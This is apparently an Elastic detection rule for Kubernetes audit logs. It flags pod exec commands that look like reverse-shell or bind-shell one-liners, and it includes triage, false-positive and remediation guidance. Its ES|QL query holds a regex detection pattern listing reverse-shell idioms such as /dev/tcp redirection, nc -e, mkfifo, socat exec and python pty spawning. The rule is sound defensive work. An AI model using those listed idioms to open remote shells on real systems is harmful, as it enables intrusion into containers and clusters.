Kubernetes Pod Exec Potential Reverse Shell

 1[metadata]
 2creation_date = "2026/04/23"
 3integration = ["kubernetes"]
 4maturity = "production"
 5updated_date = "2026/04/23"
 6
 7[rule]
 8author = ["Elastic"]
 9description = """
10Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell
11one-liners invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together 
12these patterns align with post-exploitation interactive access and command-and-control.
13"""
14from = "now-6m"
15interval = "5m"
16language = "esql"
17license = "Elastic License v2"
18name = "Kubernetes Pod Exec Potential Reverse Shell"
19note = """## Triage and analysis
20
21### Investigating Kubernetes Pod Exec Potential Reverse Shell
22
23The rule inspects Kubernetes audit exec requestURI values, URL-decodes them, parses the command query fragment, and 
24matches high-signal shell and socket idioms often used to obtain a allback shell from inside a container.
25
26### Possible investigation steps
27
28- Identify the actor (kubernetes.audit.user.username, groups, impersonation), source IP, and user agent
29  (human kubectl vs automation).
30- Resolve the target namespace, pod, and container from kubernetes.audit.objectRef.* and correlate with
31  workload ownership and change tickets.
32- Pull the raw and decoded URI from the alert document and replay the inferred command in a sandbox only if policy
33  allows—otherwise rely on audit and platform logs.
34- Hunt nearby events from the same identity: secret reads, pods/exec to other workloads, RoleBinding
35  changes, or anonymous API use.
36
37### False positive analysis
38
39- Security training, CTF-style images, or vendor diagnostics may include bash redirection or /dev/tcp examples;
40  baseline approved images and break-glass accounts.
41- Some observability or mesh sidecars use socat or sockets in ways that could overlap; validate container image and
42  command lineage.
43
44### Response and remediation
45
46- If malicious, terminate the exec session, isolate the workload or node, rotate credentials reachable from the
47  pod, and revoke pods/exec for the abused principal unless strictly required.
48"""
49references = [
50    "https://attack.mitre.org/techniques/T1609/",
51    "https://attack.mitre.org/techniques/T1059/",
52]
53risk_score = 73
54rule_id = "f1a2b3c4-d5e6-4789-a012-3456789abc01"
55severity = "high"
56tags = [
57    "Data Source: Kubernetes",
58    "Domain: Kubernetes",
59    "Use Case: Threat Detection",
60    "Tactic: Execution",
61    "Tactic: Command and Control",
62    "Resources: Investigation Guide",
63]
64timestamp_override = "event.ingested"
65type = "esql"
66query = '''
67FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version
68| WHERE kubernetes.audit.objectRef.subresource == "exec"
69  AND kubernetes.audit.requestURI LIKE "*command=*"
70| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI)
71| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}"
72| EVAL command = REPLACE(raw_commands, "command=", "")
73| EVAL command = REPLACE(command, "&", " ")
74| EVAL Esql.executed_command = REPLACE(command, "\\+", " ")
75| WHERE Esql.executed_command IS NOT NULL 
76| WHERE Esql.executed_command IS NOT NULL AND command RLIKE """.*(/dev/tcp/|/dev/udp/|zsh/net/tcp|zsh/net/udp|nc\s+-e|ncat\s+-e|netcat\s+-e|nc\s.*\s-c\s|mkfifo|socat\s.*exec|socat\s.*pty|bash\s+-i\s+>&|0>&1|>&\s*/dev/tcp|import\s+socket.*connect|import\s+pty.*spawn|socket\.socket.*connect|IO::Socket::INET|fsockopen|TCPSocket\.new|/inet/tcp/).*""" AND 
77 // local service health check patterns
78  NOT command RLIKE """.*/dev/tcp/(localhost|127\.0\.0\.1)/(8080|8443|9090|3000|5000|8888|80|443).*"""
79| KEEP *
80'''
81
82[[rule.threat]]
83framework = "MITRE ATT&CK"
84
85[[rule.threat.technique]]
86id = "T1609"
87name = "Container Administration Command"
88reference = "https://attack.mitre.org/techniques/T1609/"
89
90[[rule.threat.technique]]
91id = "T1059"
92name = "Command and Scripting Interpreter"
93reference = "https://attack.mitre.org/techniques/T1059/"
94
95[rule.threat.tactic]
96id = "TA0002"
97name = "Execution"
98reference = "https://attack.mitre.org/tactics/TA0002/"